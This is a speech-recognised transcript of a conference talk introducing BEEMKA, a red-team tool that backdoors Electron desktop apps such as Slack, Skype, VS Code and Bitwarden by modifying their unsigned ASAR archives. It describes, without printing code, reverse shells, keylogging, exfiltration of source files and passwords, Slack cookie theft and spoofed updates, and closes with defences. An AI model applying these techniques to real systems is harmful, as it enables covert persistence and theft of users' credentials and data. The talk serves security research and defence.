BG - BEEMKA / Electron Post-Exploitation When The Land Is Dry - Pavel Tsakalidis

good morning welcome to b-sides las vegas breaking ground this is pawel and he'll be giving a talk on benka electron post exploitation when the land is dry but first a few announcements we'd like to thank our sponsors and volunteers without whom this event couldn't happen especially critical stack and Val mail and Amazon and blackberry and the NSA these talks are being streamed and recorded so please don't use your cell phones and if you have questions Pavel do you want questions during your talk or a via if you have questions raise your hand and I will bring the microphone over to you thank you hi everyone my name is Pavel solidus and I'm a senior consultant for context

information security which is based in London so before I begin when I was making the presentation I was given two pieces of advice one advice was that I should start with a joke and the second advice was that I should practice I should record the whole thing and then I just do the circle again again until I'm happy with the result but by recording my presentation and listening back to it like what happened was that I heard my own voice and he heard how I sound to the outside world so instead of starting with a joke or served an apology because I have no control over my voice having said that today I'll be talking

about electron-poor exploitation when the land is dry and I will introduce a tool as well that does the whole process a bit easier so let's assume that's your you are on a red team job you have done your fishing campaign and somebody just opens the word document and you get a beacon back the next sensible step would be to just try and find a way to persist on the system but let's assume that the the endpoint is running some sort of input input protection that you've never heard of never seen before in your life and just blocking most of the things you tried to do to kind of start it like on on when the machine boots that is where

electron applications come into play and I will start straightaway with the demo to display how how it works in action and then we can I decide discuss how it actually how it can be exploited so on the right hand side we'll have the victim on the left hand side we have the listener that the attacker has set up at this point the user will just let's assume the applications pocket or don't pay attention to this to the command line and when they log in we will see that on the Left we get a diverse shell back this Run Run Xubuntu and we can see that Skype runs without any sort of warnings however we get a shell back

this this works across all operating systems as as long as the application is built with electron so now we're going to see how actually we can achieve that these are some popular applications desktop applications are have been built with electron you might the ones that stand out is slack signal Visual Studio code and Skype in this instance it was it is worth mentioning that Skype has three versions one version is Skype for business this one is not built with electron second version is the one that's built in the Windows 10 app store and that as well is not built with electron the third one is the one we download on the website and that's the

one that's built with electron so that's the only one that's vulnerable across the the operating systems so what exactly is electron and why do more and more companies use it it's it practically runs node.js in the backend and chromium in the front-end and it's effectively Chrome in the box so any electron you have running any electron application have running it's practically a Chrome browser running alongside everything else and it was developed by github about 2013 and I think their first big project was eight on the ATM browser the atom are coded or sorry so what do I do more and more companies use it well the answer is quite obvious is because it's cost effective you have to just write it once

and then cross compile across the operating system you want it you want to offer support and then you can you don't you do not need to hire software developers you can just use the code you use on your website and then we just put it on the electron application and that's it so this is an example of how Skype looks like you can practically open Skype and press control shift and I and the developer console will open so you can see there are this the inspector elements network manager it's effectively chrome but that's pretty much what what it is so to understand what makes this attack possible we'll have to discuss how it actually works

how electron works electron is based on SR files which SR files is another format of a compressed archive like zip or tar or anything like that so when you double-click on an app the first thing it does it just runs chromium and no GS I kind of spins that up and then what it does it is it loads its bootloader it's easy to understand it that way from illiterate SR once the environment is ready because Elizabeth SR does what it does is is it propels the whole environment or the application to be loaded once that's done up dot Acer is loaded which is effectively the source code of the application if you open up that SR is effectively a web root is

that there's an index.html file which you just that's the stuff Alice loaded and then everything else is loaded after that [Music] here are some facts about SR files they are not encrypted they are not signed the notes can't buy AV software although zip archives are scanned in rar and ace and star and everything else however SR files are not and they're not even encrypted and the last the most important one and is the reason why this whole presentation came to be is that there are no integrity checks in place to make sure that once you install something that it's right there they write it in the in the format that it should be so here I made an example file

but I took the a car test file and just put it in an archive and uploaded the virus total and from the 50-odd engines only five of them have identified it and I was quite surprised that by do like China has that already they are already scanning that though those kind of files and I think three out of those five products are from China so might make someone think like why the Chinese people just scan that and nothing else does so developers are weird creatures we try and protect the source code and hide the source code make sure nothing is changed nothing is edited modified or whatever however there have been a lot of developers coming coming from front

and saying can we encrypt the source file so protect source file so do something that someone might not be able to change the source files and the destiny of all those issues is they end up closed because they say well no if you want to do it you have to do it yourself this is how electron works and this is how it will work so the tool I believe pretty much all of us here have at some point written a script or a tool or some sort of application and then once we have it we have to find a really cool name about it I went the other way I always had been cut because I had a

teddy bear called BIM car when I was young and I to use this name so I have almost managed to make it happen so at the moment being a stands for basic electronics flotation modular and then I will linear help on the K a yeah I'm happy to accept any recommendations afterwards but I will reward anyone that has some sort of suggestions with a beverage of your own choosing I'm happy to bribe people to get it working and out of the box at the moment what it does is you can install keyloggers take screenshots of the application or the entire desktop you can inject opening system commands access devices and you can create targeted modules for

applications I think the most interesting part of that is the targeted modules and here we're going to see an example where an attacker can egress or spa source code files from Visual Studio code once again on the right there is the attackers endpoint and on the left is a developer that just runs Visual Studio code as you can see no warnings nothing came up everything's fine and then the developer starts opening Excel files this module is designed to only exfiltrate open tabs rather than the whole directory structure so you can see that on the right files beginning to appear and those are the ones that have been opened by the developer and by just clicking on a file we can see its

contents if someone wanted to take this step further they could just inject the file in the source code and because probably Visual Studio code has everything already unlocked and ready for the developer to use they could just do a git commit and just push the master well assuming that that company doesn't have code review process and all that but if someone is not careful enough you may end up with code in the production environment that that shouldn't be there so once I built the tool I was like I'm gonna play it safe I'm just gonna conduct the electron team and tell them this is what what I did this is the reason how it came to be do you think it

should be fixed or if something should be done and this the response I got from them yes the slide is empty because I got no response at all so I thought but that K at that moment I said okay okay fair game it's not a bug it's a feature so I'll just keep going the whole process so how does it actually work I really hope at this point I could say that there's some magic that was done and that I did something cool and I found a really cool trick or sound no there's nothing like that you can just take electrons SR just unpack it modify a file put your payload and then pack it

again and that's the end of it so when you unpack a little taster there are a lot of files files that that can be used I will hopefully thank you One Bowl of no yellow M&Ms why not oh [Laughter] yes so apparently I put in as a requirement that I don't want yellow M&Ms and actually okay thank you and there are a lot of files that someone can can edit to inject our payload in however I found that the most reliable one is Chrome extension dot yes so electron offers a number of API a number of event listeners that you can just trigger when the application loads one of them is application ready or window

created the way it works is you run chrome ear on the electron up that's the application then you run you open a window and then you have the web contents now that's kind of format of days and then you just pack the file and put it in this place and then wait for the user to run the application this is some basic functionality that bhinneka has one is to unpack or pack a file if in case you want to not unpack electron just unpack the application itself and see what it does and maybe find an XSS that wasn't there that nobody knew was there just whatever you want to do and then there's the injection where you could just take a

module and inject it inside electron when you're on inject you don't have to run unpack inject pack you just can do inject and it does everything for you also at this point I would like to also say that I hope there would be sufficient documentation on how to write your own module at this point however there isn't so if you want to build the module just have a look at the existing modules and see how the how those work and try to figure it out or just drop me a line and I won't have to help you so this is what electron is our file looks like a lot of folders a lot of JavaScript files and you can do whatever

you want with it so payload does anyone here hate JavaScript with a passion like I do if someone has never used JavaScript imagine Java and PHP getting together having a stroke and then having another stroke I came evaluated two strokes that's what JavaScript is so the all payloads are written in JavaScript all of them and there are two type two ways you can execute something from electron one of them is from within the context of the application so you just inject JavaScript inside the application and the other one is within the context of electron so that's kind of one step behind on the node.js level so here's how the applications context injection works expand on JavaScript whatever

works in Chrome will work in electron you can just instead of trying to find an XSS endpoint and an XSS vulnerability and exploit that you can just inject it straight away inside the application and long story short if you just want to load the whole jQuery and update the whole whole interface of the application you can do that and then there are extra bits that you can call from within the applications context that will give you more functionality like read files or access devices the visual studio code egress that we saw is from the applications context so you would just code inside that was just running on intervals checking when a file is open and then reading the filesystem

getting the file and exiting it back there are some restrictions though so if the application is using CSP headers you will not be able to do any post request any Ajax requests back to your to your endpoint those obviously can be bypassed by updating hosts file but then the game is in a whole different level and it's not just in that application and subscribe for example is using CSP headers but it's not using it in the HTTP headers it's using it within a meta tag which I couldn't find a way to bypass so your electron offers you some sort of API manipulation techniques that you can just remove HTTP headers but it doesn't allow you to update the file

that's coming updating half the file half the response and then we have web views that cannot be accessed web uses like a sandbox that rounds in a different process ID with in electron slack in this case is using webview so you cannot install something within the applications context you can't install a key logger because the key logger is effectively Jake JavaScript that just does Anki up and just grabs all the all the keystrokes but that does not mean that you cannot execute anything within the electrons context like a reverse shell like Skype for example because the skype factor was not in the applications context it was in the electrons context so here's how the electron contexts

payload work it's still JavaScript node GS this time and there is more functionality of the perspective of the server so you can intercept or block HTTP requests this means that when the application runs and the HX if there are new updates what you can do is you can either block that request and then the application will think that okay I'm on the latest and greatest version no need to update Oregon spoof that whole request and then redirect the user to an update that's yours in this case that would be I think more dangerous because that way someone might just install with administrative administrative administrative privileges a back door a new backdoor and then another interesting bit is that you can because

it's still a browser that's running if you tries to communicate with an endpoint that has self-signed certificates it will not even it will just stop you will just say sorry it just doesn't work there are event handlers that are triggered every time something doesn't work like for example the the certificate and you can just instruct it to bypass that so if you have an endpoint that is just an IP address and you can't install a valid SSL certificate you can just install this event handler and your request will go through now what do you need to to make this work well obviously you need local axis like we discuss in the Snyder with the r18 before and you need write access

to the installation folder on Windows it's easier because if an electron installer I detects that you are a low privileged user it will just install in the application data and therefore you have access to write in there in that directory but most installers also also offer you take the capability to install across the whole system when in that case you will go to Program Files which makes life a little bit more difficult on Linux and Mac's because you need elevated privileges to install something it's not it will be a little bit more complicated now ways to exploit and this is where it gets interesting so you can own operating system commands and you could do anything you want

however the executable is not modified so the hash of the file of the slack dot exe or Skype that exe or vs code that exe remains exactly the same so what it does is is you just instruct it totally legit application to run something that you want to run and it just cannot do it therefore we have gone to great lengths to create up Locker and white listing and black listing and all that kind of thing and memory in memory patch protection then the reverse engineering protection and encrypting the exe files and everything and then you have something like this we'll just leave the application as this but then you can just run whatever you want on the side

another valid attack would be to redistribute malicious application that way someone will just download the Installer would the Installer will obviously not be signed however how many times did you actually check if something signed just click the yes button and just install and then but the end but installed application looks like that exe will still be signed therefore it will bypass any white listing restrictions you have anything you have on that box another interesting way to attack something is you get you gain access to data that you previously did not have access to for example passwords within a password manager or messages within slack and last but not least you can spy on the user using a web camera screenshots

or microphone or whatever you want someone might argue here that this is called gathering intel on the target society calls this stalking and it's not cool and should be avoided at all costs so here's an example of how we can egress stored passwords within bid warden does anybody use beat warden nice don't use the desktop app so here again on one side we have the user and on the other hand side we have the attackers endpoint as we can see the user will just unlock their vault which we don't care about this password because we it's what's inside that counts and just once unlocked everything will be aggressed back to the attacker and as simple as

that you have just lost all your passwords because you installed a desktop app that has been somehow pocket art obviously this doesn't work on the web versions of of those apps

so what do these next generation applications try to achieve the first thing is bring the web to the desktop I say leave the web at the web but ok fine if companies want to save money just building everything with JavaScript that's fine with me the store the source code is told is stored locally again that's fine with me but it shouldn't be fine to not perform integrity checks on on your files because you expect you running something and then you have no control over what in what format it is now if it has been back toward another important thing is that you introduce a whole range of web vulnerabilities to the desktop if you have an XSS attack XSS vulnerability on

a website it's highly unlikely that you will be affected on some other website most of the time it's just affected on that specific website unless someone drops a zero-day which if someone drops 0 date to get you you probably have bigger problems than just using electron and then you can also use devices which if you do on the web version of the application Chrome will just pop up a box saying do you want me to use the camera or microphone an electron doesn't it just says can I use the camera yes here we go the light of the camera will turn on so you know by passing that it's just that you have no idea when that's

enabled here's an example of how a web vulnerability which we take on lightly which is the when you when logged in sessions are transferable which is literally like a low issue we don't really care about it but here's how it could work so we have a user that's running a vulnerable in November a backdoored version of slack and it's right login however this user is quite security aware and they have two-factor authentication as well so they feel pretty good about themselves so once putting the two FA in the user will be logged in back in the sky into slack at this point what slug does what the backdoor does it sends all HTTP requests and URLs

back to the attackers endpoint so once someone's logged in by this by this point everything has already been sent out to the attacker any and it keeps sending it to the attacker so nothing stops and here are all the cookies that have been sent grouped by time so we pick any of those and we take the whole cookie from this cookie I realize it's a cookie quite a lot from this cookie we just need B D and X next step so this video was done on the same machine but it works across IP addresses it's just easier to do a video on the same box so what we do is we just recreate all those three cookies and we

give it access to slag comm and all subdomains if you don't include all subdomains you just end up in an infinite loop so once you move all the cookies yes I could have written a script to do this quicker but I'm really good at copy pasting and I wanted the whole world to see so she look in the top right it says sign in and get started once all three cookies are in place

do you feel the suspense so once it's refreshed the top-right becomes your workspaces and by clicking it you have just gained access to the slapped slack and because if someone's running a local version of Slackware they just shut down their machine they will not be locked out it means that you will have access here until the session expires and if you keep using it the session will probably not expire also this is a good way to check if developers have shared passwords API keys if someone uploaded a legal document or a contract or something we just access the whole history and just do whatever you want so how does this the previous attack actually work so one of the API event

handlers that electron offers is the own before send headers which is which means that before any HTTP request is done it goes through here so what we do here is I take the URL and the cookie and send it back to the attacker this way it just yes it does duplicate all HTTP requests but if we had some logic to it we could just stop the moment we have everything under control also it's worth mentioning that this happens on the application level so there is no need to install a system-wide proxy or something that the user will will notice because if you do if an attacker does that it's very transparent they will never know what's

happening and if my end point instead of example.com is slack updates dot JP or something some something strange it will not be noticed because they will think that okay this is a legit slack endpoint so what are some ways to protect ourselves at the moment there isn't an official fix however electron six was released last week but didn't have time to check if integrity checks have been implemented hopefully this will change another step is to install applications of the high privilege user this mostly applies on Windows however even by doing that we can just hope that the attacker does not elevate their privileges because once they do want to have read folder write access to the folder it's game

over then we can monitor the process 3 this is this could work I think so if you see this locket of the exists or running PowerShell you can be ok lists shouldn't happen we should investigate but if you look at the right that's legit Visual Studio code process tree so it runs get transient exe dran PowerShell it runs everything so it might be quite difficult to identify what happens here and this will only protect against command injection if an attacker wants to make a CNC server and just use HTTP requests from within the app you will never know because that it's chromium itself does they all the requests and overall if you can avoid it don't

install the desktop app and yes I am talking about slack because if you have the web version of something that does exactly the same as the desktop version at this point there is no reason to install a desktop version just use the web because the browser will protect you will sandbox everything and will let you know if someone tries to access something that they shouldn't now is it just electron apps that are vulnerable to this or similar attacks no because Spotify is not using electron but Spotify is using the chrome embedded framework which is bare metal electron and instead of using SSL files they use the so-called SPF SPF files which stands for Spotify up however renaming

an SPF file dot zip you can just extract the file update index.html put hello world in and that's it I assumed that there could be some interesting attack vectors to be tested with Spotify I haven't done any of that I just realized that it's vulnerable as well and that mentioned in case someone wanted to use it as homework so the summary would be electron ops if you are on a red team or if you have compromised the host or for whatever reason and you wanna seeee and you want to either maintain persistence or if you just want to gain access to applications or data within the applications we just use an electron up that's installed most

probably you will have some sort of Visual Studio code or slack or signal or something like like that installed on a corporate machine while other things signal would be uncovered machine but yeah you get the point and fortunately and unfortunately is that this whole thing will stop existing the moment electron adds an intact check on those two files because the moment they do that you won't be able to change anything without actually changing the exe signature which I think this is the most important part of the whole attack that yes if you have pseudo access or admin access on a host yes you do whatever you want but if you try to change an exe file you will change it

hash so by changing the hash you will trigger some sort of allow alarms and alerts in this case nothing like that happens the exe will always stay the same nothing will change and you might have already have some sort of backdoored application that you have no idea that's there and because antivirus is do not check Acer files and that that means that you might have something in those files that will never see the see the light of day I was once on engagement and once I got the peak on back I was already running a system and no matter what I did they were running some sort of weird well we had unknown endpoint protection and no matter what I

did will just block a so that moment I realized they had slack installed and I just put the PowerShell payload in slack and when the user logged in you just spawned the shell back so if you want a source code it's on github and I will also be on Def Con demo Labs on Friday if you want to come and see it in action or play around with it or ask any questions or make a module I don't know you can come and have a look and that's pretty much it any questions or anything you would like me to clarify I realize this was quite quicker than expected hello hi thanks for the presentation I have what

questions because you mentioned that the CSP headers are are honored yes from a developer's perspective from a nap developers perspective is it possible to use something like s RI sub resource integrity in order to verify your JavaScript files inside the application would that stop an attacker because integrity checks on the whole archives that's something that electron has to do right you can't do it as an application developer but you can you could use this or I I'm thinking to to check the JavaScript files within your app yes but I will only protect you with against a specific specific file that you as a developer have inserted in the application but the attacker can insert their own so it can look it can load

something from example.com or attacker.com which since they inject the JavaScript they will just not put the S right in and they will just load the file as normal

thank you for the presentation it was really nice I was wondering at some point you mentioned that this electron is on node.js right yes so have you checked it was it able to access any resources that no J's no J's has access to for example I believe it also has access to file system yes yeah so the Visual Studio code example that was so the application was calling in OGS file system and that's how it's reading the file and that's how it's sending it back so anything that no GS does it can be accessible so that means we can actually like this could be used to exfiltrate any files posted on that yes oxidation you can create your own browser like C&C

server and just double click on folders and do whatever you want yeah

agree talking thanks so much so is just curious maybe I missed this for getting a reverse shell like from the electron context how does that exactly work so you can call actually I can I can show you I think it'd be easier

so if you do Linux for instance

how do I the one anyone know the shortcut to

Oh oh there is there is magic happens yeah so you just use the nodejs net and child process then you just run whatever come on come on you want whichever host and you can just as long as you have if you have a one-liner to do it you can just use here and it just will work fine and then you mentioned the privilege difference for the install application yes so how does that protect the process so if you let's say you have a user just download double clicks on the phishing email and the attacker gets reverse shell but they're still running on the same privileges as that user if slack was installed in Program Files you

would not be able to change that file so that in that's not adapt essence it will not it more secure but the moment the attacker gets admin or system it's game over okay awesome thanks cool thank you very much enjoy the rest of the conference and conferences [Applause]